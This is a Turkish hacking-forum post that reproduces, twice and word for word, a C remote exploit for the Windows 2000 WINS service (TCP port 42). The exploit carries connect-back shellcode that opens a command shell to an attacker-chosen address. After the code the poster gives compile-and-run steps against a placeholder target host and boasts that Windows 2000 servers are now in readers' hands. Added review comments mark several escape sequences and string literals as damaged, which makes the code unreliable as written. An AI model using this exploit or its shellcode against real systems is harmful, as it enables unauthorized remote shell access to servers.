
 Exploit dokümanları ve anlatım teknikleri

By.KaBuS
weB MaSteR
By.KaBuS


Mesaj Sayısı : 223
Kayıt tarihi : 13/06/09
Yaş : 31
Nerden : Notalar İcinden
Lakap : By.KaBuS

Exploeit dokumanlar ve anlatim teknikleri Empty
MesajKonu: Exploeit dokumanlar ve anlatim teknikleri   Exploeit dokumanlar ve anlatim teknikleri Icon_minitimePtsi Haz. 15, 2009 12:07 pm

Exploit dokümanları ve anlatım teknikleri

Kod:
Windows 2000 kullanan sunucular için C ile yazılmış exploit (hedef servis: WINS, TCP 42).

************************************************** ***********/
/* ZUCWins 0.1 - Wins 2000 remote root exploit */
/* Exploit by : <zuc@hack.it> */
/* works on Windows 2000 SP3/SP4 probably every language */
/************************************************** ***********/

/* Successfully tested by K-OTik Security on Win2k ENGLISH & FRENCH */

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/socket.h>
#include <time.h>
#include <netinet/in.h>
#include <curses.h>
#include <unistd.h>
#include <errno.h>
#include <netdb.h>
#include <signal.h>
#include <sys/types.h>
#include <sys/time.h>
#include <sys/select.h>
#include <netinet/in.h>
#include <arpa/inet.h>

/*
 * shellcode[]: opaque machine-code payload that main() copies into the
 * outgoing buffer. main() overwrites bytes 2-3 and 4-7 of this array with
 * the XOR-masked connect-back port and address before sending.
 *
 * Defender note: the escapes spell the ASCII strings "WS2_32.DLL", ".exe"
 * and "\cmd", which is consistent with the header's description of a
 * connect-back command shell; they are usable as static strings in
 * detection content (bytes 2-7 vary per run and are not).
 *
 * NOTE(review): as rendered on this page several escapes appear with a space
 * after the backslash, presumably page damage, so the literals shown are not
 * the original byte sequence. Kept exactly as posted.
 */
char shellcode[] =
"\xeb\x25\xe9\xfa\x99\xd3\x77\xf6\x02\x06\x6c\ x59\ x6c\x59\xf8"
"\x1d\x9c\xde\x8c\xd1\x4c\x70\xd4\x03\x58\x46\ x57\ x53\x32\x5f"
"\x33\x32\x2e\x44\x4c\x4c\x01\xeb\x05\xe8\xf9\ xff\ xff\xff\x5d"
"\x83\xed\x2c\x6a\x30\x59\x64\x8b\x01\x8b\x40\ x0c\ x8b\x70\x1c"
"\xad\x8b\x78\x08\x8d\x5f\x3c\x8b\x1b\x01\xfb\ x8b\ x5b\x78\x01"
"\xfb\x8b\x4b\x1c\x01\xf9\x8b\x53\x24\x01\xfa\ x53\ x51\x52\x8b"
"\x5b\x20\x01\xfb\x31\xc9\x41\x31\xc0\x99\x8b\ x34\ x8b\x01\xfe"
"\xac\x31\xc2\xd1\xe2\x84\xc0\x75\xf7\x0f\xb6\ x45\ x09\x8d\x44"
"\x45\x08\x66\x39\x10\x75\xe1\x66\x31\x10\x5a\ x58\ x5e\x56\x50"
"\x52\x2b\x4e\x10\x41\x0f\xb7\x0c\x4a\x8b\x04\ x88\ x01\xf8\x0f"
"\xb6\x4d\x09\x89\x44\x8d\xd8\xfe\x4d\x09\x75\ xbe\ xfe\x4d\x08"
"\x74\x17\xfe\x4d\x24\x8d\x5d\x1a\x53\xff\xd0\ x89\ xc7\x6a\x02"
"\x58\x88\x45\x09\x80\x45\x79\x0c\xeb\x82\x50\ x8b\ x45\x04\x35"
"\x93\x93\x93\x93\x89\x45\x04\x66\x8b\x45\x02\ x66\ x35\x93\x93"
"\x66\x89\x45\x02\x58\x89\xce\x31\xdb\x53\x53\ x53\ x53\x56\x46"
"\x56\xff\xd0\x89\xc7\x55\x58\x66\x89\x30\x6a\ x10\ x55\x57\xff"
"\x55\xe0\x8d\x45\x88\x50\xff\x55\xe8\x55\x55\ xff\ x55\xec\x8d"
"\x44\x05\x0c\x94\x53\x68\x2e\x65\x78\x65\x68\ x5c\ x63\x6d\x64"
"\x94\x31\xd2\x8d\x45\xcc\x94\x57\x57\x57\x53\ x53\ xfe\xca\x01"
"\xf2\x52\x94\x8d\x45\x78\x50\x8d\x45\x88\x50\ xb1\ x08\x53\x53"
"\x6a\x10\xfe\xce\x52\x53\x53\x53\x55\xff\x55\ xf0\ x6a\xff\xff"
"\x55\xe4";

/*
 * mess[]: fixed leading bytes of the packet. main() copies sizeof(mess)-1
 * bytes (everything except the terminating NUL) to the start of the send
 * buffer. The second row is a commented-out duplicate of the first.
 * NOTE(review): the last literal is wrapped in the middle of an escape and
 * contains a split "\x4 e"; this looks like page damage and is kept as posted.
 */
char mess[] =
"\x00\x03\x0d\x4c\x77\x77\xFF\x77\x05\x4e\x00\ x3c\ x01\x02\x03\x04"
// "\x00\x03\x0d\x4c\x77\x77\xFF\x77\x05\x4e\x00\ x3c\ x01\x02\x03\x04"

"\x6c\xf4\x3d\x05\x00\x02\x4e\x05\x00\x02\x4e\ x05\ x00\x02\x4e\x05\x00\x02\
x4e\x05\x00\x02\x4e\x05\x00\x02\x4e\x05\x00\x02\x4 e\x05\x00\x02\x4e\x05";
/*
 * rep[]: pattern that main() appends 30 times directly after mess[]
 * (sizeof(rep)-1 bytes per copy). Same wrapping damage as in mess[].
 */
char rep[] =

"\x90\x01\x4e\x05\x90\x00\x4e\x05\x90\x00\x4e\ x05\ x90\x00\x4e\x05\x90\x00\
x4e\x05\x90\x00\x4e\x05\x90\x00\x4e\x05\x90\x03\x4 e\x05\x90\x00\x4e\x05";
/* Forward declaration; usage() is defined after main(). */
void usage();

/*
 * main: builds one large buffer and sends it over TCP to port 42 of the
 * address given in argv[1].
 *
 *   argv[1]  target (passed to gethostbyname() and to inet_addr())
 *   argv[2]  connect-back IPv4 address, patched into shellcode[]
 *   argv[3]  connect-back port, patched into shellcode[]
 *
 * Buffer layout (mess3): mess[] header, 30 copies of rep[], then a
 * 200000-byte run of 0x90 with shellcode[] copied in 198000 bytes into
 * that run.
 *
 * Defender note: the observable artefact is one TCP connection to port 42
 * (the file header names WINS as the target service) carrying roughly
 * 200 KB, almost all of it 0x90 bytes. Traffic of that shape, particularly
 * from a host that is not a configured WINS replication partner, is worth
 * alerting on; limiting port 42 to known partners removes the exposure for
 * every other source.
 *
 * Every path ends in exit(); the function never returns to its caller.
 */
int main(int argc, char *argv[])
{
/* i and len are never used below; sock2 and sock3 are never assigned and
   only appear in the close() calls at the end. */
int i,sock,sock2,sock3,addr,len=16;
int rc;
/* Mask constants XORed into the connect-back values. The byte 0x93 also
   occurs in shellcode[], presumably where the payload removes the mask
   again (not verified here). */
unsigned long XORIP = 0x93939393;
unsigned short XORPORT = 0x9393;
int cbport;
long cbip;

struct sockaddr_in mytcp;
struct hostent * hp;

/* Exactly three arguments are required; usage() prints help and exits. */
if(argc<4 || argc>4)
usage();

/* atoi() and inet_addr() results are used without any validation. */
cbport = htons(atoi(argv[3]));
cbip = inet_addr(argv[2]);
cbport ^= XORPORT;
cbip ^= XORIP;
/* Patch the masked values over bytes 2-3 (port) and 4-7 (address) of
   shellcode[]; only the first 2 and 4 bytes of the int/long objects are
   copied. */
memcpy(&shellcode[2],&cbport,2);
memcpy(&shellcode[4],&cbip,4);

/* Two large automatic arrays (about 410 KB together), zero-filled first. */
char mess2[200000];
memset(mess2,0,sizeof(mess2));
char mess3[210000];
memset(mess3,0,sizeof(mess3));
int ir;
/* mess2 becomes a 200000-byte run of 0x90. */
for(ir =0;ir<200000;ir++)mess2[ir]='\x90';
/* Header first, then 30 copies of rep[]; le tracks the write offset. */
memcpy(mess3,mess,sizeof(mess)-1);
int r=0;int le=sizeof(mess)-1;
for(r;r<30;r++)
{
memcpy(mess3+le,rep,sizeof(rep)-1);
le+=sizeof(rep)-1;
}
/* Filler run, with shellcode[] (including its NUL) placed 198000 bytes in. */
memcpy(mess3+le,mess2,200000);
memcpy(mess3+le+198000,shellcode,sizeof(shellcode) );
/* Send length runs sizeof(shellcode) bytes past the filler; that tail is the
   zero fill from memset. Nothing checks lenr against sizeof(mess3). */
int lenr=le+200000+sizeof(shellcode);
/* Result is stored in hp but never read afterwards. */
hp = gethostbyname(argv[1]);

/* This is the address actually used for the connection. */
addr = inet_addr(argv[1]);

sock=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP);
/* NOTE(review): tests for descriptor 0, whereas socket() signals failure
   with -1. */
if (!sock)
{
//printf("socket() error...\n");
exit(-1);
}

/* mytcp is filled field by field without being zeroed; port 42 is
   hard-coded. */
mytcp.sin_addr.s_addr = addr;

mytcp.sin_family = AF_INET;

mytcp.sin_port=htons(42);

/* NOTE(review): this printf and the two below have their string literal
   split across two lines on the page; kept as posted. */
printf("
[*] connecting the target\n");

/* rc is assigned but never checked, and send()'s return value is ignored,
   so the progress messages are printed regardless of the outcome and are
   not evidence that anything was delivered. */
rc=connect(sock, (struct sockaddr *) &mytcp, sizeof (struct
sockaddr_in));
printf("
[*] sending exploit\n");
send(sock,mess3,lenr,0);
printf("
[*] exploit sent\n");
/* Waits 5 seconds, then tears down. shutdown() is called on sock again
   after it has been closed; sock2 and sock3 were never assigned. */
sleep(5);
shutdown(sock,1);
close(sock);
shutdown(sock,2);
close(sock2);
shutdown(sock,3);
close(sock3);
exit(0);
}

/*
 * usage: prints the expected argument order and a sample invocation, then
 * exits with status 0. Never returns to the caller.
 */
void usage()
{
unsigned int a; /* unused */
printf("\nUsage: <victim-host> <connectback-ip> <connectback port>\n");
printf("Sample: ZUC-WINShit www.vulnwins.com 31.33.7.23 31337\n\n");
exit(0);
}

exploiti nasıl indirdiyseniz adını değiştirmeyinn
gcc win2000.c -o win
./win www.hedef.com 212.0.0.1 31337
olmazsa /win deneyin

windows2000 kullanan serverlar elinizde saygılar



Kod:
Windows 2000 kullanan sunucular için C ile yazılmış exploit (hedef servis: WINS, TCP 42).

************************************************** ***********/
/* ZUCWins 0.1 - Wins 2000 remote root exploit */
/* Exploit by : <zuc@hack.it> */
/* works on Windows 2000 SP3/SP4 probably every language */
/************************************************** ***********/

/* Successfully tested by K-OTik Security on Win2k ENGLISH & FRENCH */

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/socket.h>
#include <time.h>
#include <netinet/in.h>
#include <curses.h>
#include <unistd.h>
#include <errno.h>
#include <netdb.h>
#include <signal.h>
#include <sys/types.h>
#include <sys/time.h>
#include <sys/select.h>
#include <netinet/in.h>
#include <arpa/inet.h>

/*
 * shellcode[]: opaque machine-code payload that main() copies into the
 * outgoing buffer. main() overwrites bytes 2-3 and 4-7 of this array with
 * the XOR-masked connect-back port and address before sending.
 *
 * Defender note: the escapes spell the ASCII strings "WS2_32.DLL", ".exe"
 * and "\cmd", which is consistent with the header's description of a
 * connect-back command shell; they are usable as static strings in
 * detection content (bytes 2-7 vary per run and are not).
 *
 * NOTE(review): as rendered on this page several escapes appear with a space
 * after the backslash, presumably page damage, so the literals shown are not
 * the original byte sequence. Kept exactly as posted.
 */
char shellcode[] =
"\xeb\x25\xe9\xfa\x99\xd3\x77\xf6\x02\x06\x6c\ x59\ x6c\x59\xf8"
"\x1d\x9c\xde\x8c\xd1\x4c\x70\xd4\x03\x58\x46\ x57\ x53\x32\x5f"
"\x33\x32\x2e\x44\x4c\x4c\x01\xeb\x05\xe8\xf9\ xff\ xff\xff\x5d"
"\x83\xed\x2c\x6a\x30\x59\x64\x8b\x01\x8b\x40\ x0c\ x8b\x70\x1c"
"\xad\x8b\x78\x08\x8d\x5f\x3c\x8b\x1b\x01\xfb\ x8b\ x5b\x78\x01"
"\xfb\x8b\x4b\x1c\x01\xf9\x8b\x53\x24\x01\xfa\ x53\ x51\x52\x8b"
"\x5b\x20\x01\xfb\x31\xc9\x41\x31\xc0\x99\x8b\ x34\ x8b\x01\xfe"
"\xac\x31\xc2\xd1\xe2\x84\xc0\x75\xf7\x0f\xb6\ x45\ x09\x8d\x44"
"\x45\x08\x66\x39\x10\x75\xe1\x66\x31\x10\x5a\ x58\ x5e\x56\x50"
"\x52\x2b\x4e\x10\x41\x0f\xb7\x0c\x4a\x8b\x04\ x88\ x01\xf8\x0f"
"\xb6\x4d\x09\x89\x44\x8d\xd8\xfe\x4d\x09\x75\ xbe\ xfe\x4d\x08"
"\x74\x17\xfe\x4d\x24\x8d\x5d\x1a\x53\xff\xd0\ x89\ xc7\x6a\x02"
"\x58\x88\x45\x09\x80\x45\x79\x0c\xeb\x82\x50\ x8b\ x45\x04\x35"
"\x93\x93\x93\x93\x89\x45\x04\x66\x8b\x45\x02\ x66\ x35\x93\x93"
"\x66\x89\x45\x02\x58\x89\xce\x31\xdb\x53\x53\ x53\ x53\x56\x46"
"\x56\xff\xd0\x89\xc7\x55\x58\x66\x89\x30\x6a\ x10\ x55\x57\xff"
"\x55\xe0\x8d\x45\x88\x50\xff\x55\xe8\x55\x55\ xff\ x55\xec\x8d"
"\x44\x05\x0c\x94\x53\x68\x2e\x65\x78\x65\x68\ x5c\ x63\x6d\x64"
"\x94\x31\xd2\x8d\x45\xcc\x94\x57\x57\x57\x53\ x53\ xfe\xca\x01"
"\xf2\x52\x94\x8d\x45\x78\x50\x8d\x45\x88\x50\ xb1\ x08\x53\x53"
"\x6a\x10\xfe\xce\x52\x53\x53\x53\x55\xff\x55\ xf0\ x6a\xff\xff"
"\x55\xe4";

/*
 * mess[]: fixed leading bytes of the packet. main() copies sizeof(mess)-1
 * bytes (everything except the terminating NUL) to the start of the send
 * buffer. The second row is a commented-out duplicate of the first.
 * NOTE(review): the last literal is wrapped in the middle of an escape and
 * contains a split "\x4 e"; this looks like page damage and is kept as posted.
 */
char mess[] =
"\x00\x03\x0d\x4c\x77\x77\xFF\x77\x05\x4e\x00\ x3c\ x01\x02\x03\x04"
// "\x00\x03\x0d\x4c\x77\x77\xFF\x77\x05\x4e\x00\ x3c\ x01\x02\x03\x04"

"\x6c\xf4\x3d\x05\x00\x02\x4e\x05\x00\x02\x4e\ x05\ x00\x02\x4e\x05\x00\x02\
x4e\x05\x00\x02\x4e\x05\x00\x02\x4e\x05\x00\x02\x4 e\x05\x00\x02\x4e\x05";
/*
 * rep[]: pattern that main() appends 30 times directly after mess[]
 * (sizeof(rep)-1 bytes per copy). Same wrapping damage as in mess[].
 */
char rep[] =

"\x90\x01\x4e\x05\x90\x00\x4e\x05\x90\x00\x4e\ x05\ x90\x00\x4e\x05\x90\x00\
x4e\x05\x90\x00\x4e\x05\x90\x00\x4e\x05\x90\x03\x4 e\x05\x90\x00\x4e\x05";
/* Forward declaration; usage() is defined after main(). */
void usage();

/*
 * main: builds one large buffer and sends it over TCP to port 42 of the
 * address given in argv[1].
 *
 *   argv[1]  target (passed to gethostbyname() and to inet_addr())
 *   argv[2]  connect-back IPv4 address, patched into shellcode[]
 *   argv[3]  connect-back port, patched into shellcode[]
 *
 * Buffer layout (mess3): mess[] header, 30 copies of rep[], then a
 * 200000-byte run of 0x90 with shellcode[] copied in 198000 bytes into
 * that run.
 *
 * Defender note: the observable artefact is one TCP connection to port 42
 * (the file header names WINS as the target service) carrying roughly
 * 200 KB, almost all of it 0x90 bytes. Traffic of that shape, particularly
 * from a host that is not a configured WINS replication partner, is worth
 * alerting on; limiting port 42 to known partners removes the exposure for
 * every other source.
 *
 * Every path ends in exit(); the function never returns to its caller.
 */
int main(int argc, char *argv[])
{
/* i and len are never used below; sock2 and sock3 are never assigned and
   only appear in the close() calls at the end. */
int i,sock,sock2,sock3,addr,len=16;
int rc;
/* Mask constants XORed into the connect-back values. The byte 0x93 also
   occurs in shellcode[], presumably where the payload removes the mask
   again (not verified here). */
unsigned long XORIP = 0x93939393;
unsigned short XORPORT = 0x9393;
int cbport;
long cbip;

struct sockaddr_in mytcp;
struct hostent * hp;

/* Exactly three arguments are required; usage() prints help and exits. */
if(argc<4 || argc>4)
usage();

/* atoi() and inet_addr() results are used without any validation. */
cbport = htons(atoi(argv[3]));
cbip = inet_addr(argv[2]);
cbport ^= XORPORT;
cbip ^= XORIP;
/* Patch the masked values over bytes 2-3 (port) and 4-7 (address) of
   shellcode[]; only the first 2 and 4 bytes of the int/long objects are
   copied. */
memcpy(&shellcode[2],&cbport,2);
memcpy(&shellcode[4],&cbip,4);

/* Two large automatic arrays (about 410 KB together), zero-filled first. */
char mess2[200000];
memset(mess2,0,sizeof(mess2));
char mess3[210000];
memset(mess3,0,sizeof(mess3));
int ir;
/* mess2 becomes a 200000-byte run of 0x90. */
for(ir =0;ir<200000;ir++)mess2[ir]='\x90';
/* Header first, then 30 copies of rep[]; le tracks the write offset. */
memcpy(mess3,mess,sizeof(mess)-1);
int r=0;int le=sizeof(mess)-1;
for(r;r<30;r++)
{
memcpy(mess3+le,rep,sizeof(rep)-1);
le+=sizeof(rep)-1;
}
/* Filler run, with shellcode[] (including its NUL) placed 198000 bytes in. */
memcpy(mess3+le,mess2,200000);
memcpy(mess3+le+198000,shellcode,sizeof(shellcode) );
/* Send length runs sizeof(shellcode) bytes past the filler; that tail is the
   zero fill from memset. Nothing checks lenr against sizeof(mess3). */
int lenr=le+200000+sizeof(shellcode);
/* Result is stored in hp but never read afterwards. */
hp = gethostbyname(argv[1]);

/* This is the address actually used for the connection. */
addr = inet_addr(argv[1]);

sock=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP);
/* NOTE(review): tests for descriptor 0, whereas socket() signals failure
   with -1. */
if (!sock)
{
//printf("socket() error...\n");
exit(-1);
}

/* mytcp is filled field by field without being zeroed; port 42 is
   hard-coded. */
mytcp.sin_addr.s_addr = addr;

mytcp.sin_family = AF_INET;

mytcp.sin_port=htons(42);

/* NOTE(review): this printf and the two below have their string literal
   split across two lines on the page; kept as posted. */
printf("
[*] connecting the target\n");

/* rc is assigned but never checked, and send()'s return value is ignored,
   so the progress messages are printed regardless of the outcome and are
   not evidence that anything was delivered. */
rc=connect(sock, (struct sockaddr *) &mytcp, sizeof (struct
sockaddr_in));
printf("
[*] sending exploit\n");
send(sock,mess3,lenr,0);
printf("
[*] exploit sent\n");
/* Waits 5 seconds, then tears down. shutdown() is called on sock again
   after it has been closed; sock2 and sock3 were never assigned. */
sleep(5);
shutdown(sock,1);
close(sock);
shutdown(sock,2);
close(sock2);
shutdown(sock,3);
close(sock3);
exit(0);
}

/*
 * usage: prints the expected argument order and a sample invocation, then
 * exits with status 0. Never returns to the caller.
 */
void usage()
{
unsigned int a; /* unused */
printf("\nUsage: <victim-host> <connectback-ip> <connectback port>\n");
printf("Sample: ZUC-WINShit www.vulnwins.com 31.33.7.23 31337\n\n");
exit(0);
}

exploiti nasıl indirdiyseniz adını değiştirmeyinn
gcc win2000.c -o win
./win www.hedef.com 212.0.0.1 31337
olmazsa /win deneyin

windows2000 kullanan serverlar elinizde saygılar